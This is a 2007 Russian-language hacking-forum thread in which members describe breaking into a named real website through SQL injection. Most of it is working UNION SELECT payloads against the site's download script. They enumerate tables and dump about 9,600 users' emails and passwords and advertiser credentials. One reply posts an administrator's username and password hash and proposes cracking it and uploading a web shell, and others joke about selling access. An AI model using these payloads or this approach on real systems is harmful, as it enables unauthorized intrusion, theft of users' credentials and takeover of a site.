Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
13.06.2007, 16:06
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
http://techpowerup.com
Набрел сегодня на ресурс http://techpowerup.com
Решил посмотреть google p-r 4 индекс цитирования 275, вообщем то достаточно посещаемы... принялся за исследование.
обнаружил что присутствует недостаточная фильтрация параметра id у скриптига get.php
Код:
http://www.techpowerup.com/downloads/get.php?id=187
Немного повозился и понял что это ненаглядная 5 ветка
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Начал исследование
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,count(TABLE_NAME),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables/*
Первой особо интересной таблой оказалась list_user_user. И тут оказалсь что мажик квотс нету)))
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='list_user_user'/*
Тут же появился запрос
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),confirmed,entered,char(58,58,58),email,uniqid,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+list_user_user/*
9600 с чем то пользователей =)
Поехал дальше наткнулся на phpads_clients
Здесь уже все оказалось не так просто
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name='phpads_clients'/*
Запрос получился такой:
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+phpads_clients/*
Но в ответ меня послали, табла не в той базе, пришлось поковыряться с table_schema:
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,Table_schema,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_name='phpads_clients'/*
и далее пошел уже правельный запрос:
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,email,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+techpowerup_ads.phpads_clients/*
Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом..
Прям так все карты я раскрывать не буду, так или иначе методы действия и подходы к выводу инфы я показал, приложив немного усилий вы получите любую информацию из базы =)
Вот такие дела нынче
Код:
з.Ы таблы
forum
moderation
moderator
administrator
можно не смотеть
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
Последний раз редактировалось Constantine; 13.06.2007 в 22:13..
|
|
|
14.06.2007, 21:27
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
А зачем в отдельную тему? ничего примечательного вроде..
|
|
|
|
14.06.2007, 21:32
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869
Репутация:
3033
|
|
Дело в том что pr и индекс цетирования высок, да и вообще просто есть пространство для развития мылси =) Обидно кидать скуль вместе с тренировочными инжектами на безизветсных сайтах
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
14.06.2007, 23:11
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
http://www.techpowerup.com/ads/admin/index.php
Код:
w1zzard:639e4f0709b66134e304e35073ec9a2d
Расшифровываем пасс и заливаем шелл благо способов несколько=\
и далее пошел уже правельный запрос:
Код:
Код:
http://www.techpowerup.com/downloads/get.php?id=-187'+union+select+1,concat_ws(char(58),clientid,em ail,clientusername,clientpassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+techpoweru p_ads.phpads_clients/*
Но меня ожидал коллосальный облом... таблица и содержащяяся в ней инфа оказлась полным фуфлом.. эта особенность PhpAdsNew и OpenAds (что по сути одно и то же). По дефолту админ хранится в таблице phpads_config. Поля admin и admin_pw для логина и пасса соответственно. Пасс в чистом мд5.
__________________
|
|
|
|
15.06.2007, 00:14
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Constantine, пр не такой высокий...4 это мало  |
|
|
|
15.06.2007, 00:45
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
уже пр 5)))
Константин поднял посещаемость))
|
|
|
|
15.06.2007, 01:34
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Хыыы)) надо будет тож выложить какую-нит пр5-6, чтоб потом сливать дороже :d :d
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
